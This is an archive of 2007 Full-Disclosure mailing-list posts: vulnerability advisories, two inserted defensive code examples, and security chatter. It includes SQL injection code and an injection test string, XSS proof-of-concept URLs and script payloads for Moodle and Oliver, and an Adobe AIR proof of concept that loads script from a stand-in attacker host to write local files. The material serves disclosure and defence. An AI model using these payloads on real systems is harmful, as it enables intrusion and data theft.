[Full-disclosure] POWER PHLOGGER v.2.2.5 (username) SQL Injection
POWER PHLOGGER v.2.2.5 (username) SQL Injection

Author: Attila Gerendi (Darkz)
Date: June 25, 2007
Package: POWER PHLOGGER (http://www.phpee.com/)
Versions Affected: v.2.2.5 (Other versions may also be affected)
Severity: SQL Injection

Description:

Input passed to the username parameter in login.php isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass login sequence. This SQL injection is blind, so the user can not produce variations in the server input; however, using BENCHMARK it still can be used to retrieve sensitive data from the database and/or heavily load the server and produce DDOS attack.

The vulnerable code piece is in /include/get_userdata.php

    /* assign the user's values */
    $sql = "SELECT * FROM ".PPHL_TBL_USERS." WHERE id='$id' OR username='$id'";
    $res = mysql_query($sql);

The vulnerable parameter at this point is $id, and it is set through session variable $username from login.php without any sanitation.

Status:

The product web page says: "Active development of PowerPhlogger has been stopped as of August 2006. The announced successor Phlogger3 will not be released. Also, I am not able to provide you with support for any previous version.", so any user using this version should correct the bug herself.

Solution:

modify

    /* assign the user's values */
    $sql = "SELECT * FROM ".PPHL_TBL_USERS." WHERE id='$id' OR username='$id'";
    $res = mysql_query($sql);

to

    /* assign the user's values */
    $id = mysql_escape_string($id);
    $sql = "SELECT * FROM ".PPHL_TBL_USERS." WHERE id='$id' OR username='$id'";
    $res = mysql_query($sql);

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
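The lookup from the advisory above with bound parameters instead of escaping, as an added example that is neither Power Phlogger code nor part of the original post. `mysql_escape_string()` ignores the connection character set and the `mysql_*` extension was removed in PHP 7, so a prepared statement is the durable form of this fix. Assumptions: an in-memory SQLite database reached through PDO stands in for the MySQL backend, and the table layout, sample rows and function names are constructed for the demonstration.

```php
<?php
// Added example, not Power Phlogger code. SQLite in memory stands in for MySQL;
// the table layout, sample rows and function names below are assumptions.
define('PPHL_TBL_USERS', 'pphl_users');

function open_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE ' . PPHL_TBL_USERS . ' (id TEXT PRIMARY KEY, username TEXT, email TEXT)');
    $db->exec("INSERT INTO " . PPHL_TBL_USERS . " VALUES ('1001', 'alice', 'alice@example.test')");
    $db->exec("INSERT INTO " . PPHL_TBL_USERS . " VALUES ('1002', 'bob', 'bob@example.test')");
    return $db;
}

// Query built as in the advisory's "before" code: $id becomes part of the SQL text.
function get_userdata_concat(PDO $db, string $id): array
{
    $sql = "SELECT * FROM " . PPHL_TBL_USERS . " WHERE id='$id' OR username='$id'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Same lookup with placeholders: the driver passes $id as data only.
function get_userdata_bound(PDO $db, string $id): array
{
    $stmt = $db->prepare(
        'SELECT * FROM ' . PPHL_TBL_USERS . ' WHERE id = :id OR username = :name'
    );
    $stmt->execute([':id' => $id, ':name' => $id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Run one lookup and describe the outcome instead of letting an exception escape.
function describe(callable $lookup, PDO $db, string $id): string
{
    try {
        return count($lookup($db, $id)) . ' row(s)';
    } catch (PDOException $e) {
        return 'SQL error';
    }
}

$db = open_demo_db();

// Constructed inputs: a normal name, a name with an apostrophe, and a value
// whose quote characters change the WHERE clause when concatenated.
$inputs = ['alice', "o'brien", "nobody' OR 'x'='x"];

foreach ($inputs as $input) {
    printf(
        "%-20s concatenated: %-10s bound: %s\n",
        $input,
        describe('get_userdata_concat', $db, $input),
        describe('get_userdata_bound', $db, $input)
    );
}
```

The concatenated form fails outright on the apostrophe and matches every row for the third input, while the bound form treats all three inputs as plain values.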
[Full-disclosure] High Risk Flaw in Sun's Java Web Start
John Heasman of NGSSoftware has discovered a high risk vulnerability in Sun Microsystems' Java Web Start that ships with the JRE and JDK on Windows platforms. The vulnerability affects the following versions of Java Web Start:

Java Web Start in JDK and JRE 5.0 Update 11 and earlier
Java Web Start in SDK and JRE 1.4.2_13 and earlier

This vulnerability permits an untrusted Java Web Start application to overwrite any file that can be accessed under the application user context. This ultimately enables an untrusted application to break out of the sandbox by modifying the user's Java security policy. An untrusted application could be launched via a malicious web page.

Details
***

The JNLP API defines a set of services that bypass the security sandbox to enable some common client operations. The BasicService is used to discover the application's codebase. Then, the PersistenceService caches content on the local hard drive, keyed to a URL that is relative to the application's base. The name/value pairs provided by the PersistenceService are similar to browser cookies. The Java Web Start implementation honours this legacy by naming the pairs muffins. Arbitrary files can be written to due to a directory traversal flaw in the PersistenceService.

Solution

This issue has now been resolved; further details are available at:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102957-1

NGSSoftware Insight Security Research
http://www.ngssoftware.com
http://www.databasesecurity.com/
+44(0)208 401 0070

--
E-MAIL DISCLAIMER

The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402
Re: [Full-disclosure] [Dailydave] iPhone Roadblock
matthew wollenweber wrote:

> I'm one of the lucky (or possibly crazy) people that managed to get an iPhone yesterday. If you're curious, I'm very happy with it so far. I'm not an Apple nut that buys all things Apple, but after years of smartphones that never seemed quite right, the iPhone really seems to have hit the mark. My biggest worry was that it used Edge rather than 3G. While at some points this is noticeable, the caching and windowing mechanisms really make up for the difference. On the whole it's the best smartphone experience I've had. But you can read all the reviews in a more appropriate forum...
>
> I'm really interested in hacking up my iPhone. Anything with a *nix OS underneath is just too tempting to leave alone. Unfortunately Apple threw a curve ball that's outside my skill set. The iPhone doesn't mount as a harddrive. I couldn't find any options in iTunes and in linux I only got:
>
> Jun 30 21:25:42 lothlorien kernel: usb 1-4: new full speed USB device using ehci_hcd and address 15
> Jun 30 21:25:42 lothlorien kernel: usb 1-4: Product: iPhone
> Jun 30 21:25:42 lothlorien kernel: usb 1-4: Manufacturer: Apple Inc.
> Jun 30 21:25:42 lothlorien kernel: usb 1-4: SerialNumber: XYZ123456789
> Jun 30 21:25:42 lothlorien kernel: usb 1-4: configuration #1 chosen from 3 choices
>
> USB device drivers aren't my thing. Anyone have any suggestions on how to get the thing mounted or to go about figuring out how to do so? Thanks for any help.

It's incredibly unlikely that you will be able to mount the underlying OS filesystem in any way or form. I expect (as is often the case) the most viable way to hack the iPhone will be using its official firmware upgrading system and a hacked firmware which poses as an official one.

Without doubt, we are in for some interesting discoveries.

--
/**
 * Robert Clark
 **
 * Technical Student ALICE/DAQ
 * Software Engineer CERN PH/AID
 */
[Full-disclosure] Moodle XSS / Liesbeth base CMS sensitive information disclosure
Dear [EMAIL PROTECTED],

1. MustLive (mustlive at websecurity.com dot ua) reported cross-site scripting vulnerability in Moodle 1.7.1 via search parameter of index.php, example:

http://host/user/index.php?contextid=4roleid=0id=2group=perpage=20search=%22style=xss:expression(alert(document.cookie))%20

Detailed information (in Ukrainian)
http://websecurity.com.ua/1045/

Original message (in Russian)
http://securityvulns.ru/Rdocument391.html

2. Durito [damagelab] (durito at mail dot ru) reported information leak in Liesbeth base CMS (Vendor: www.doubleflex.com), example:

http://host/config.inc

file accessible through Web contains sensitive information, including database account.

Original message (in Russian)
http://securityvulns.ru/Rdocument392.html

--
http://securityvulns.com/
You know my name - look up my number (The Beatles)
Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
Jim Popovitch wrote:

> The US DoD gets hit all the time... not because they are so much insecure, but because they are such a primary target. It's a fact of life, just like doctors and nurses are the most vulnerable to contract a disease. There are precautions, and they are taken, but the odds are greater.

_AND_ at least they noticed and moved to act against it. Every day, many hundreds of thousands of _successful_ attacks against corporations, small businesses and private individuals not only go unreported by them, but entirely undetected and largely unnoticed by the _attacked_.

The reason for this comment? A great many of those mocking the DHS over this incident are part of the group just mentioned and are too stupid to ever realize it...

Regards,

Nick FitzGerald
[Full-disclosure] Buffer overflow in HP Instant Support Driver Check (SDD) ActiveX control
John Heasman of NGSSoftware has discovered a high risk vulnerability in the HP Instant Support Driver Check (SDD) ActiveX control, which is marked safe for scripting. The vulnerability affects the following version of the SDD control:

HP Instant Support Driver Check versions prior to 1.5.0.3

This vulnerability could be exploited on a malicious web page in order to execute arbitrary code under the user context of the browser.

Details
***

The queryHub([IN] BSTR bstrValue) method contains a stack based buffer overflow.

Solution

This issue has now been resolved in version 1.5.0.3. Further details are available at:
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01077597

NGSSoftware Insight Security Research
http://www.ngssoftware.com
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070
Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
Nick FitzGerald wrote:

> _AND_ at least they noticed and moved to act against it. Every day, many hundreds of thousands of _successful_ attacks against corporations, small businesses and private individuals not only go unreported by them, but entirely undetected and largely unnoticed by the _attacked_.
>
> The reason for this comment? A great many of those mocking the DHS over this incident are part of the group just mentioned and are too stupid to ever realize it...

An also *informed* number of members realize the potential of gaining greater budgets by leaving machines vulnerable in an effort to lobby congress for yet more pork barrel money to secure these networks from uber hackers. So let's sift through crapaganda while it's on the table, shall we.

/* SNIP */

“China has downloaded 10 to 20 terabytes of data from the NIPRNet (DOD’s Non-Classified IP Router Network),” said Maj. Gen. William Lord, director of information, services and integration in the Air Force’s Office of Warfighting Integration and Chief Information Officer, during the recent Air Force IT Conference in Montgomery, Ala. (http://www.gcn.com/print/25_25/41716-1.html)

/* END SNIP */

20 Terabytes huh. Unnoticed 20 terabytes? At that rate they would need some massive pipes to download this all undetected. Let's analyze the comment and the logic... 20 terabytes on an OC3 would take you 291 hours 44 minutes and 16 seconds give or take. Gigabit Ethernet, 45 hours 30 minutes and change... So how did they manage to achieve this marvelous feat of magic undetected? It obviously couldn't be at high speeds which means they would have had to either go on undetected for quite some time, or they embedded fiber taps INSIDE of a DoD location (doubtable).

20 terabytes... I'll tell you what I think usually happens with DoD and governmental sectors... Private corporations and those in them slacking (http://cryptome.org/cg-leakage.htm). Do I blame DoD, absolutely. I take a different view of this altogether under a what if I was a contractor with no one monitoring me...

Dictating to secretary: We need another million for these uh golf... *scratch that* for these vertically integrated, high end clustered reverse path packet injection token based AES FIPS standardized firewalls. It's cutting edge technology which guarantees and mitigates against unauthorized intrusions.

The government should undertake a *real* method to secure their infrastructure. Have it revamped by industry experts and implemented by those same experts. Not some deep pocket contractors who will skim so much of the money away and into accounts in the triple borders. (reality... like it or not)

--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g'

Wise men talk because they have something to say; fools, because they have to say something. -- Plato
[Full-disclosure] [Sec-1 Ltd] Buffer Truncation Abuse in Microsoft SQL Server Based Applications
Buffer Truncation Abuse in Microsoft SQL Server Based Applications

Release Date: 3rd July 2007
Author: Gary O'Leary-Steele
Web Site: www.sec-1.com

This paper is designed to document an attack technique Sec-1 recently adopted during the course of their application assessments. The basic principle of this technique has existed for some time; however, we hope this paper will provide an insight of how a variation of the technique can be adopted to attack common forgotten password functionality within web applications.

Our initial intention was to release this paper along with a case study demonstrating the flaw within a commercial application. However, since the vendor has yet to fix the flaw, it was decided that an initial censored release will be followed up with the complete release further down the line.

The paper can be downloaded here:
http://www.sec-1labs.co.uk/papers/BTA_CensoredRelease.pdf

Sec-1 specialises in the provision of network security solutions. For more information on products and services we offer visit www.sec-1.com or call 0113 257 8955.
[Full-disclosure] This pages crashes browsers
Found this page, click on Accessories then try to print the page, it seems to crash all the browsers I have soon as I try to print. Thought someone here might like to play with the crash.

http://www.movincool.com/portable-air-conditioner/officepro60.php#
Re: [Full-disclosure] This pages crashes browsers
> Found this page, click on Accessories then try to print the page, it seems to crash all the browsers I have soon as I try to print. Thought someone here might like to play with the crash.

Printed from IE7 and FF 2.0.0.4 no problems.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blogs.eweek.com/cheap_hack/
Contributing Editor, PC Magazine
[EMAIL PROTECTED]
Re: [Full-disclosure] [Dailydave] iPhone Roadblock
Actually the guys over at: http://iphone.fiveforty.net/wiki are pretty far along of mounting the iPhone. They can read files from a sandbox setup on the phone for iTunes. I believe they're hooking the iTunes dlls being used and REing a basic interface.

Also, I haven't heard of anyone doing serious work regarding loading unofficial firmware. I'm sure that's a route people may consider, but everyone seems happy with the iPhone and just want it to do more and be more open. Reinventing the wheel by writing new firmware seems like a lose-lose situation.

On 7/3/07, Robert Clark [EMAIL PROTECTED] wrote:

> matthew wollenweber wrote:
>
>> I'm one of the lucky (or possibly crazy) people that managed to get an iPhone yesterday. If you're curious, I'm very happy with it so far. I'm not an Apple nut that buys all things Apple, but after years of smartphones that never seemed quite right, the iPhone really seems to have hit the mark. My biggest worry was that it used Edge rather than 3G. While at some points this is noticeable, the caching and windowing mechanisms really make up for the difference. On the whole it's the best smartphone experience I've had. But you can read all the reviews in a more appropriate forum...
>>
>> I'm really interested in hacking up my iPhone. Anything with a *nix OS underneath is just too tempting to leave alone. Unfortunately Apple threw a curve ball that's outside my skill set. The iPhone doesn't mount as a harddrive. I couldn't find any options in iTunes and in linux I only got:
>>
>> Jun 30 21:25:42 lothlorien kernel: usb 1-4: new full speed USB device using ehci_hcd and address 15
>> Jun 30 21:25:42 lothlorien kernel: usb 1-4: Product: iPhone
>> Jun 30 21:25:42 lothlorien kernel: usb 1-4: Manufacturer: Apple Inc.
>> Jun 30 21:25:42 lothlorien kernel: usb 1-4: SerialNumber: XYZ123456789
>> Jun 30 21:25:42 lothlorien kernel: usb 1-4: configuration #1 chosen from 3 choices
>>
>> USB device drivers aren't my thing. Anyone have any suggestions on how to get the thing mounted or to go about figuring out how to do so? Thanks for any help.
>
> It's incredibly unlikely that you will be able to mount the underlying OS filesystem in any way or form. I expect (as is often the case) the most viable way to hack the iPhone will be using its official firmware upgrading system and a hacked firmware which poses as an official one.
>
> Without doubt, we are in for some interesting discoveries.
>
> --
> /**
>  * Robert Clark
>  **
>  * Technical Student ALICE/DAQ
>  * Software Engineer CERN PH/AID
>  */

--
Matthew Wollenweber
[EMAIL PROTECTED] | [EMAIL PROTECTED]
www.cyberwart.com
Re: [Full-disclosure] This pages crashes browsers
The crash happens in mshtml so it could easily be version dependent. IE6 W2K here.

Geo.

> Printed from IE7 and FF 2.0.0.4 no problems.
>
> Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blogs.eweek.com/cheap_hack/
> Contributing Editor, PC Magazine
> [EMAIL PROTECTED]
Re: [Full-disclosure] [Dailydave] iPhone Roadblock
From what I understand of the phone it is running a native version of OS X. Which may mean to say it's running the underlying BSD kernel of 'Darwin' with a modified Aqua (which is their implementation of XWindows) on top. As with any type of blackbox testing you must go with the 'knowns' to find the 'unknowns' (yai!!). Learn what the points of ingress are from the device itself, i.e. is safari still vulnerable and maybe can be used as a gateway into the directory structure? Or can you write code to use safari in that manner? If not then you must take a closer look inside the phone.

One thing is certain, at some point a developer needed a way into the phone to do proper debugging, maybe not a JTAG interface on this device but some type of 'shell'. I have seen certain sites where people have taken apart the device and have started to peer into it. I do know that there is no SDK for the device but it does have a fully functional Safari browser which will allow for AJAX so quick start coding ;0

m

matthew wollenweber wrote:

> I'm one of the lucky (or possibly crazy) people that managed to get an iPhone yesterday. If you're curious, I'm very happy with it so far. I'm not an Apple nut that buys all things Apple, but after years of smartphones that never seemed quite right, the iPhone really seems to have hit the mark. My biggest worry was that it used Edge rather than 3G. While at some points this is noticeable, the caching and windowing mechanisms really make up for the difference. On the whole it's the best smartphone experience I've had. But you can read all the reviews in a more appropriate forum...
>
> I'm really interested in hacking up my iPhone. Anything with a *nix OS underneath is just too tempting to leave alone. Unfortunately Apple threw a curve ball that's outside my skill set. The iPhone doesn't mount as a harddrive. I couldn't find any options in iTunes and in linux I only got:
>
> Jun 30 21:25:42 lothlorien kernel: usb 1-4: new full speed USB device using ehci_hcd and address 15
> Jun 30 21:25:42 lothlorien kernel: usb 1-4: Product: iPhone
> Jun 30 21:25:42 lothlorien kernel: usb 1-4: Manufacturer: Apple Inc.
> Jun 30 21:25:42 lothlorien kernel: usb 1-4: SerialNumber: XYZ123456789
> Jun 30 21:25:42 lothlorien kernel: usb 1-4: configuration #1 chosen from 3 choices
>
> USB device drivers aren't my thing. Anyone have any suggestions on how to get the thing mounted or to go about figuring out how to do so? Thanks for any help.
>
> --
> Matthew Wollenweber
> [EMAIL PROTECTED] | [EMAIL PROTECTED]
> www.cyberwart.com
>
> ___
> Dailydave mailing list
> [EMAIL PROTECTED]
> http://lists.immunitysec.com/mailman/listinfo/dailydave
[Full-disclosure] CoffeeWars 8
Eight.

A Fibonacci number.
The first prime, cubed.
The number of bits in a byte.
The number of days in one of the Beatles' weeks.
The number of fluid ounces in a cup. -- (subtle foreshadowing)

These are all interesting and important facts about the number eight, but in a moment they will seem puny and insignificant compared to what is about to be revealed. Brace yourself. Ensure that you are wearing safety goggles to protect your eyes, gloves to protect your hands, and other appropriate safety items for protection. Check to be sure that you are wearing two pairs of socks, because the first pair is about to get knocked right off.

Eight is also the number of this year's CoffeeWars.

That is correct, DefCon attendees. For the past se7en years (ha!), on Friday morning when the con begins, and everyone is trying to get through the registration lines so they can buy the black t-shirts they've been dreaming about all year, we've been hard at work. Each year, intrepid contestants bring their beans from the far corners of the earth. We take those beans. We treat them with respect. We apply a standard grinding and brewing technique honed and perfected through a lifetime of experience and-- as has been mentioned-- the previous seven coffee battles. A select team of experienced, refined, and opinionated judges will sample each brew and arrive (by blind voting) at the answer to the universally acknowledged most important question of the year: Which hacker has the best coffee of them all?

In the novel FOR EVERY SIN, Aharon Appelfeld tells the story of camp refugees coping with the immediate aftermath of release at the end of World War II. The following conversation takes place between the main character and a woman he meets along his way:

    ...Drink, dearie, this coffee revives the soul
    Thank you. I have nothing to give you.
    No need. I'm glad to be serving it. If there is some meaning to life, it's coffee.

    [Appelfeld, Aharon. FOR EVERY SIN. New York: Vintage, 1989. p. 58]

There it is, my friends. There it absolutely is. And so we issue our annual invitation: furnish your own lives with additional meaning by joining in our contest. The rules are few, simple, and obvious.

1: ONLY WHOLE BEANS. No pre-ground stuff. No crystals. Beans are the only acceptable entry. We recommend submitting about 1/2 lb, so there is enough in case of a mishap.

2: BEANS MUST BE UNFLAVORED. We are into coffee-flavored coffee, not hazelnut-blueberry-acetone-whatever.

3: WE ONLY DO COFFEEWARS. We don't know who is in charge of other aspects of the con, we cannot answer questions about other events, etc.

4: NO DECAF. By all that is sacred. Please.

5: YOUR ENTRY WILL BECOME OURS, unless you make a plan with us at the time you submit it to recover the leftovers at the end of the contest. Sorry-- it is just too much to keep track of otherwise.

6. ONLY ONE ENTRY PER CONTESTANT. So lead with your best.

So feel the pride. Bring your favorite beans, and see how they measure up against the rest of the hacker coffee field. This is one of the craziest contest ideas ever, and you'll feel happy and fulfilled for having played a part in this, the eighth instantiation. Plus, you just might win. Somebody will, after all.

The contest will begin when the con begins, and it will end when we can't take it any more, or when we run out of coffee, whichever comes first. There is probably some upper limit to the amount of coffee that the judges can consume, so serious entrants may wish to ensure their beans a slot by pre-registering. Just send e-mail to foofus at foofus dot net, and we'll set aside an entry form for you.

Good luck, and see you at the con.

--Foofus.
[Full-disclosure] The Top 5 most Popular Web2.0 Services Hackers Cannot live Without
http://www.gnucitizen.org/blog/the-top-5-most-popular-web20-services-hackers-cannot-live-without

Let's have a look at the top 5 most popular Web2.0 services hackers cannot live without. This listing is based on my personal research that was also presented at OWASP Web Application Security Conference 2007 in Italy.

The article covers:

Yahoo Pipes
Dapper
Feed43
Zoho Creator
Google Reader

enjoy

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
Re: [Full-disclosure] [Dailydave] iPhone Roadblock
matthew wollenweber wrote:

> Actually the guys over at: http://iphone.fiveforty.net/wiki are pretty far along of mounting the iPhone. They can read files from a sandbox setup on the phone for iTunes. I believe they're hooking the iTunes dlls being used and REing a basic interface.
>
> Also, I haven't heard of anyone doing serious work regarding loading unofficial firmware. I'm sure that's a route people may consider, but everyone seems happy with the iPhone and just want it to do more and be more open. Reinventing the wheel by writing new firmware seems like a lose-lose situation.

Reinventing and modifying to remove roadblocks are two very different things.
[Full-disclosure] Security on AIR: Local file access through JavaScript
Hi! It's just a very first look to AIR (Adobes Integrated Runtime) and its possibilities to process HTML/JS. AIR is beta by now, so Adobe may change things in the final release. ## What is AIR? Quote from Adobe: Adobe Integrated Runtime (AIR) is a cross- operating system runtime that allows you to leverage your existing web development skills (Flash, Flex, HTML, JavaScript, Ajax) to build and deploy Rich Internet Applications (RIAs) to the desktop. ## Some security related informations on AIR: - The installer throws a warning about it's ability for unrestricted system access (so it's not a real surprise what AIR apps are capable of) - AIR uses WebKit as renderer on both supported platforms, Windows and MacOS - AIR introduces some JavaScript functions to access file systems and remote services, file SQL queries and open sockets - SWF files in the AIR application sandbox can cross-script any SWF file from any domain - Remote SWF files can only read files inside the security sandbox - SWF/ActionScript objects can access DOM and JavaScript (and vice versa I guess) - External JavaScript sources can be included and executed ## File access In general every file on local file system can be accessed by AIR apps. This includes reading, writing, appending or deletion as well as testing for file and directory existence. Another interesting feature is the possibility to overwrite calling files inside compiled AIR application during runtime. ## Example (only tested on OSX so far) For this to work in a real world scenario a service used by an AIR app must be vulnerable to a persistant XSS (or another typical vulnerability), and the app needs to call data in a way that payloads gets rendered and executed. 
This basic example consists of 4 files: - AIR application descriptor file: App.xml - Calling HTML file inside the AIR app package: caller.html - Malicious external JavaScript: overwrite.js - A file which just contains aliases for AIR runtime: AIRAliases.js (part of AIR SDK) # App.xml ?xml version=1.0 encoding=UTF-8? application xmlns=http://ns.adobe.com/air/application/1.0.M4; appId=air.poc.overwrite version=0.1 nameAIR Overwrite/name rootContent systemChrome=standard visible=truecaller.html/ rootContent /application # caller.html # For lazyness reasons the JS is included straight away # But it also works if exploited and included during runtime html head titleAIR Overwrite/title script src=AIRAliases.js type=text/javascript/script script src=http://attacker/overwrite.js; type=text/javascript/ script /head body onload=remoteLoad() h1local data/h1 /body /html # overwrite.js function remoteLoad(){ var localFile = air.File.documentsDirectory; localFile = localFile.resolve(/local/path/to/aip/resources/ caller.html); // i.e. on MacOS: /Applications/AIR-overwrite.air/Contents/ Resources/caller.html var localFileStream = new air.FileStream(); localFileStream.open(localFile, air.FileMode.APPEND); localFileStream.writeUTFBytes(data from remote); } To compile, the AIR SDK must be installed (beside the actual runtime). The bin of the SDK dir contains ADT, a command-line tool to generate AIR files: $ adt -package AIR-overwrite.air App.xml AIRAliases.js caller.html After installing and running AIR-overwrite.app, data from remote is appended to caller.html. Another interesting point for overwriting inside AIR apps could be META-INF/application.xml which contains the pointers to the resources or certificates. The example is kinda lame, I know. With such remote access much fancier stuff is imaginable. But what I found somehow funny is the fact that AIR doesn't have any mechanism to recognize changes to its own files. 
## Conclusion

Macromedia/Adobe Flash has a long history of bad or no security, so AIR seems to stay in that long tradition. By introducing those PNDF (Potentially Dangerous Native Functions - thanks to Wisec for making up this term :) Adobe opens new vectors XSS can cause. Stuff like SameOrigin policies and access restrictions are there for a very good and known reason. Adobe seems to know about the security implications as they describe in their developer docs, but nonetheless it doesn't make it any better from my point of view. There are already some real world services/sites offering AIR where exploitation works the way described.

## URLs:

- AIR installer http://labs.adobe.com/downloads/air.html
- AIR SDK http://labs.adobe.com/downloads/airsdk.html

fukami
--
SektionEins GmbH
http://sektioneins.de
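A host-side check for the gap noted at the end of the post above (the runtime does not recognize changes to its own files), as an added example that is not part of the original post and not Adobe's code. The function names, the demo key and the constructed package layout are assumptions for illustration; the baseline is sealed with an HMAC because the post points out that the app can write to any file the user can.

```python
import hashlib
import hmac
import json
import os
import tempfile


def sha256_file(path):
    """Hash a file in chunks so large resources do not load into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(app_root):
    """Map every file under app_root (relative, '/'-separated) to its SHA-256."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(app_root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, app_root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def seal(manifest, key):
    """HMAC over the canonical JSON form, so a rewritten baseline is detectable."""
    blob = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, blob, hashlib.sha256).hexdigest()


def compare(baseline, tag, key, app_root):
    """Return modified/added/removed files; refuse a baseline whose seal fails."""
    if not hmac.compare_digest(seal(baseline, key), tag):
        raise ValueError("baseline manifest failed its integrity check")
    current = build_manifest(app_root)
    return {
        "modified": sorted(p for p in baseline
                           if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo():
    """Constructed package layout using the file names from the post."""
    key = b"constructed-demo-key"  # assumption: kept outside the user's profile
    with tempfile.TemporaryDirectory() as root:
        files = {
            "caller.html": b"<html><body><h1>local data</h1></body></html>",
            "AIRAliases.js": b"// runtime aliases",
            "META-INF/application.xml": b"<application/>",
        }
        for rel, content in files.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as handle:
                handle.write(content)
        baseline = build_manifest(root)
        tag = seal(baseline, key)
        # The change the post describes: bytes appended to caller.html at runtime.
        with open(os.path.join(root, "caller.html"), "ab") as handle:
            handle.write(b"data from remote")
        return compare(baseline, tag, key, root)


if __name__ == "__main__":
    print(demo())
```

The baseline should be taken immediately after installation, before the application has run for the first time.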
[Full-disclosure] DNS Pinning Explained
http://christ1an.blogspot.com/2007/07/dns-pinning-explained.html

If you want to catch up on attacking internal Web sites by circumventing the same origin policy with Anti DNS Pinning, this is the right place to go.

--
Christian Matthies
http://christ1an.blogspot.com
[Full-disclosure] Cross Site Scripting in Oliver Library Management System
BACKGROUND
==========

Oliver is the web-based Library Management System for Schools. Softlink has built on the understanding of thousands of school clients, over many years, and has designed a new system for school libraries and learning resource centres in the 21st century

-- from http://www.softlink.co.uk

DETAILS
=======

During a penetration test for an educational institution, several XSS vulnerabilities were found in their Oliver installations. Due to the test constraints it was not possible to ascertain the exact version of the product, but all instances that have been tested have been found trivially vulnerable.

Some of the vulnerable input fields include:

1) GET parameters

http://www.victim.com/oliver/gateway/gateway.exe?X_=000fapplication=Oliverdisplayform=mainupdateform=;scriptalert(XSS);/script
http://www.victim.com/oliver/gateway/gateway.exe?X_=000fdisplayform=main;scriptalert(XSS);/script

2) POST parameters in search forms

In the Basic Search page, the following parameters are vulnerable:

- TERMS
- database
- srchad
- SuggestedSearch
- searchform

As a Proof-Of-Concept exploit, the following string can be appended to any of the listed parameters:

scriptalert(xss);/script

3) Username login field:

The application also fails to properly filter the username parameter, as can be seen when passing to the application the following string as username:

--scriptalert(xss)/script

VENDOR RESPONSE
===============

15/06/2007 Vendor contacted. No response received
25/06/2007 Vendor contacted for the second time. No response received
03/07/2007 Advisory published
Re: [Full-disclosure] DNS Pinning Explained
On 7/3/07, christ1an [EMAIL PROTECTED] wrote:
> http://christ1an.blogspot.com/2007/07/dns-pinning-explained.html

you're giving me (F5) DynDNS headaches. nscd tweaks, -Dsun.net.inetaddr.ttl..., rare indeed for a client to handle DNS pinning properly. heh
Re: [Full-disclosure] This pages crashes browsers
Sounds like a buggy print driver and not a buggy browser.

- Eric Sites

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Larry Seltzer
Sent: Tuesday, July 03, 2007 10:06 AM
To: Geo.; full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] This pages crashes browsers

Found this page, click on Accessories then try to print the page, it seems to crash all the browsers I have soon as I try to print. Thought someone here might like to play with the crash.

Printed from IE7 and FF 2.0.0.4 no problems.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blogs.eweek.com/cheap_hack/
Contributing Editor, PC Magazine
[EMAIL PROTECTED]
Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
Old as in, I heard about it June 21, 2007 when the story surfaced... you are now enlightening us a whole week and a half later..
Re: [Full-disclosure] This pages crashes browsers
I'm fine. Doesn't crash by me.

On 7/3/07, Eric Sites [EMAIL PROTECTED] wrote:
> Sounds like a buggy print driver and not a buggy browser.
>
> - Eric Sites
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Larry Seltzer
> Sent: Tuesday, July 03, 2007 10:06 AM
> To: Geo.; full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
> Subject: Re: [Full-disclosure] This pages crashes browsers
>
> Found this page, click on Accessories then try to print the page, it seems to crash all the browsers I have soon as I try to print. Thought someone here might like to play with the crash.
>
> Printed from IE7 and FF 2.0.0.4 no problems.
>
> Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blogs.eweek.com/cheap_hack/
> Contributing Editor, PC Magazine
> [EMAIL PROTECTED]

--
http://www.goldwatches.com/watches.asp?Brand=14
http://www.jewelerslounge.com
Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
